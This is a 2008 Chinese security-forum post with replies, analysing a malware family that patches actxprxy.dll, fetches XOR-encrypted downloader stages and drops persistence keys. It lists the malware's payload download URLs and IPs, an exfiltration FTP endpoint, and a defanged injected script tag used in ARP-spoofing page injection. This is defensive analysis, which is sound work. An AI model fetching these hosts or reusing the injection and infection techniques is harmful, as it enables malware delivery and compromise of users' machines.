首页
社区
课程
招聘
[原创]走马观花之actxprxy.dll 病毒群
发表于: 2008-11-12 15:10 12460

[原创]走马观花之actxprxy.dll 病毒群

2008-11-12 15:10
12460

原贴见:碰上很诡异的病毒,紧急求助!(瀑泪)
http://bbs.pediy.com/showthread.php?t=76188&tcatid=43
--------------------------------------------------------------------------

       粗略地看了看,和几个月前在公司流行的那个很象,应该是新的变种,想看看是否有利用
ms08-67的网马,静态大致地分析了一下,凭记忆写个大概,谬误之处,请您指出。

       一、actxprxy.dll
        
       正常的系统文件actxprxy.dll被改写,文件日期、大小不变。
       入口地址代码被改为:
        .text:71CC12BD 90                                             nop
        .text:71CC12BE E9 82 14 01 00                          jmp     loc_71CD2745
      
       代码流程:
       下载 http://kgb.gbu12.info/gbu.gif ,保存为wmsetup.dll,执行。
        url是xor简单加密的。代码里有诡异的字串    db 'CNNIC#v1',0      

       二、wmsetup.dll (gbu.gif)

       下载 'http://tk.234132.info/update.gif' 保存为 temp\qq_update.cab ,临时文件为"qqs????.tmp\qqsF2A8.tmp"。下载成功后加载执行。   url也是xor加密的。

       三、  qq_update.cab(update.gif、qqsF2A8.tmp)
       和KuNgBiM的“一个被Gdi漏洞利用后的下载者分析”里的是一样的,可以参阅:
       http://bbs.pediy.com/showthread.php?t=73991&tcatid=43

     大致流程:   
     1、删除以下注册表项:

   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersionShellServiceObjectDelayLoad
   JavaView
   desktopwin  
   这是以前版本变种使用的注册表项

     2、接着检查是否存在 \Program Files\Messenger 目录,如没有则创建。
     建立目录后,病毒把嵌在内部的一块(3e00h 字节)代码生成为 \Program Files   \Messenger\msgmr.dll

    (其中前900h字节是加密的,先XOR解密...)

     3、注册表写入
    [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DA191DE0-AA86-4ED0-4B87-293D48B2AE99}\InprocServer32]
(Default) = "%ProgramFiles%\Messenger\msgmr.dll"
ThreadingModel = "Apartment"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
msnmsg = "{DA191DE0-AA86-4ED0-4B87-293D48B2AE99}"

    4、rundll32.exe "\Program Files\Messenger\msgmr.dll",UIMessage

    5、生成unxxx.bat删除自身

    四、msgmr.dll

     说一下,如何得到msgmr.dll
     upx 解压wmsetup.dll.
     debug       wmsetup.dll
     -a100
     mov si,1110
     mov cx,900
     xor byte ptr[si],3a
     loop 106
     int 20
    -g
    -rcx
     3e00
    -nmsgmr.dll
    -w1110
    -q
     
    把嵌在内部的一块(2600h 字节)代码生成为 \windows\Fonts\Framdee.ttf  (其中前4D0h字节是加密的,先XOR解密...)
然后执行它...
   
    五、 Framdee.ttf
    同样的,利用debug得到。
   
     程序有2个主要模块:_2、_3

     _3 流程如下:

     解密获得地址,下载:'http://ru.soviet-kgb.info/v.gif'

     这是个下载列表,病毒据此下载执行几十个木马、病毒、盗号软件。

     比较特殊的是一般的病毒下载列表文件大多采用文本格式,这个v.gif是二进制格式,还有自己的文件标志。

      简单的说明一下:
      文件头部总长18h(24字节),头部 0-1 二个字节是文件标志 ‘1011’,2-3 二字节是木马下载地址的总数(urls) 21h ,接下来4-7 四字节是 urls * 每个地址占用的长度 110h (272) 字节的总长度,程序中对此会进行校验,8-9字节是年份,a-b是月份,c-d是日期,后面难道是时、分、秒...
      整理后的木马下载清单:
      http://117.23.205.227/new/001.cab
      http://117.23.205.227/new/002.cab
      http://117.23.205.227/new/003.cab
      http://117.23.205.227/new/004.cab
      http://117.23.205.227/new/005.cab
      http://117.23.205.227/new/006.cab
      http://117.23.205.227/new/007.cab
      http://117.23.205.227/new/008.cab
      http://117.23.205.227/new/009.cab
      http://117.23.205.231/new/030.cab
      http://117.23.205.231/new/031.cab
      http://117.23.205.231/new/032.cab
      http://117.23.205.231/new/033.cab
      http://58.53.128.140/new/010.cab
      http://58.53.128.140/new/011.cab
      http://58.53.128.140/new/012.cab
      http://58.53.128.140/new/013.cab
      http://58.53.128.140/new/014.cab
      http://58.53.128.140/new/015.cab
      http://58.53.128.140/new/016.cab
      http://58.53.128.140/new/017.cab
      http://58.53.128.140/new/018.cab
      http://58.53.128.140/new/019.cab
      http://60.191.223.14/new/020.cab
      http://60.191.223.14/new/021.cab
      http://60.191.223.14/new/022.cab
      http://60.191.223.14/new/023.cab
      http://60.191.223.14/new/024.cab
      http://60.191.223.14/new/025.cab
      http://60.191.223.14/new/026.cab
      http://60.191.223.14/new/027.cab
      http://60.191.223.14/new/029.cab
      http://60.191.223.14/new/034.cab

     接着,解密获得地址:'http://us.soviet-kgb.info/v.asp' ,通过 'http://us.soviet-kgb.info/v.asp'?action=update&version=0 调用 ,下载病毒,保存为 \windows\AppPatch\AcXtrnel.sdb,加载,并执行其中的模块 :DLPUpdate .

     病毒建立了注册表项 HKEY_LOCAL_MACHINE, "Software\Adobe",用来保存木马清单。

      _2 ,大致是load \windows\AppPatch\AcXtrnel.sdb 获得 DLPTerminate、DLPInit、DLPTerminate、DLPUpdate模块地址。

    六、AcXtrnel.sdb
        
            2个主要模块:
1、DLPInit :

     解密释放内嵌的代码 ,生成 \windows\AppPatch\AcSpecf.dll ,加载,获得其中的FtpInit、FtpTerminate入口地址。

     解密(XOR)得到地址:http://ftp.db884829.info/ftp.asp,作为参数传递,调用 FtpInit。

     解密释放内嵌代码,生成 \windows\system32\drivers\eth8023.sys ,修改注册表,然后加载驱动!

     读取注册表 HKEY_LOCAL_MACHINE, "Software\\Google" 下的子项 (由DLPUpdate 写入的) 发送ARP欺骗包,劫持HTTP通讯, 在返回的正常页面里插入病毒网页 !

  3、DLPUpdate :
   
     解密获得地址 :'http://css.db884829.info/css.txt'  ,下载,这是个二进制文件,前4字节文件标志:!BEv ,2字节00,之后为xor加密的网马内容。
      解密后为:<script language="javascript" SRC="hxxp://y.ads009.info/vip.js"></script> .( 为免误伤,我把http改成hxxp)
     病毒校验文件头后把其后的数据写入注册表供ARP攻击使用。
     可惜的是y.ads009.info似乎死了,没法看是否有利用ms08-67的网马。   

     在以前分析的案例里,.js指向一个.htm,再连接n个网页,利用falshplayer\MS06-014\realplay\联众游戏大厅\暴风影音等漏洞,下载木马,该木马是update.gif复本.

    七、AcSpecf.dll
      vmware卸了,木抓到样本。印象中主要实现3个模块功能:FtpInit / FtpSend / FtpTerminate。

    八、034.cab
         ...
         1、读取\windows\system32\actxprxy.dll,检测是否已中毒,标志为文件起始偏移14H 字节是否为 315 h,偏移16H是否为1011 h,未感染则解读actxprxy.dll,保存程序入口代码,修改程序入口代码,在程序空隙插入病毒代码,使得程序先执行病毒代码再执行原代码,程序文件大小、日 期均不改变。 以目前的代码看,可以利用315H 和 1011H4字节实现该病毒的免疫。
         2、释放文件ThunderAdvise.dll到\windows\Downloaded Program Files\ ,修改注册表实现自启动.
         3、后释放uninstall.bat 删除自己。
         

   
    九、n个.cab
         ... 累死了


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 7
支持
分享
最新回复 (10)
雪    币: 101
活跃值: (88)
能力值: ( LV2,RANK:140 )
在线值:
发帖
回帖
粉丝
2
强!顶~~~~~~~~~~~~~~
2008-11-12 17:28
0
雪    币: 101
活跃值: (88)
能力值: ( LV2,RANK:140 )
在线值:
发帖
回帖
粉丝
3
CNNIC病毒1号?
2008-11-12 17:33
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
我替换了无毒的actxprxy.dll怎么还是不能恢复?只要连上网就会一直不停下载病毒了?

我发现下载的都是msgmr.dll, wmsetup.dll, qq_setup.cab还有 windows\system32下的1.kab, 2.kab。

这种病毒要怎么根除呢?还望各位大侠指点!
2008-11-13 00:17
0
雪    币: 231
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
大虾  我等小菜  实在无奈就GHOST一下吧
2008-11-13 06:52
0
雪    币: 75
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
呵呵 恢复吧。主谋不是actxprxy.dll
2008-11-20 01:54
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
大虾 我等小菜只能监控和GHOST一下
2008-11-20 15:05
0
雪    币: 218
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
只能望而兴叹了
2008-11-20 17:33
0
雪    币: 209
活跃值: (19)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
在开机登陆前lsass,winlogon都加载了hb*.dll
2008-11-21 15:37
0
雪    币: 417
活跃值: (475)
能力值: ( LV9,RANK:1250 )
在线值:
发帖
回帖
粉丝
10
学习下,太强了.
2008-11-21 22:29
0
雪    币: 290
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
帖子不错 帮顶
2008-11-25 09:57
0
游客
登录 | 注册 方可回帖
返回
//